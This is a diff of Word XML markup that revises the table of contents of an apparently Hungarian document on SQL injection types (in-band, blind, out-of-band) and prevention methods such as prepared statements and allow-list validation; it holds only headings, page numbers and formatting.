+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-              </w:rPr>
-              <w:t>SQL INJECTION</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106697 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1884,17 +1880,15 @@
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106698" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610875" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>1.1.</w:t>
@@ -1902,7 +1896,6 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -1912,56 +1905,56 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Típusai</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610875 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Meghatározása</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106698 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1976,24 +1969,22 @@
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106699" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610876" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>1.1.1.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2003,55 +1994,234 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Sávon belüli (in-band, classic) SQLi</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610876 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-              </w:rPr>
-              <w:t>Példa</w:t>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1320"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc70610877" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>1.1.2.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Vak (blind, inferential) SQLi</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610877 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1320"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc70610878" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>1.1.3.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Sávon kívüli (out-of-band) SQLi</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610878 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106699 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>6</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2066,17 +2236,15 @@
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106700" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610879" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>1.2.</w:t>
@@ -2084,7 +2252,6 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2094,148 +2261,56 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Megelőzési módjai</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610879 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Következményei</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106700 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>6</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TJ2"/>
-            <w:tabs>
-              <w:tab w:val="left" w:pos="880"/>
-              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106701" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:noProof/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>1.3.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-                <w:noProof/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:noProof/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Megelőzési módjai</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106701 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>6</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2245,87 +2320,285 @@
           <w:pPr>
             <w:pStyle w:val="TJ3"/>
             <w:tabs>
-              <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106702" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610880" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Előkészített utasítások (prepared statements) használata</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610880 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-              </w:rPr>
-              <w:t>1.3.1.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc70610881" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Tárolt eljárások (stored procedures) használata</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610881 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc70610882" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610882 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc70610883" w:history="1">
+            <w:r>
+              <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Az összes felhasználó által adott bemenet elkerülése</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610883 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-              </w:rPr>
-              <w:t>Példa</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106702 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>6</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
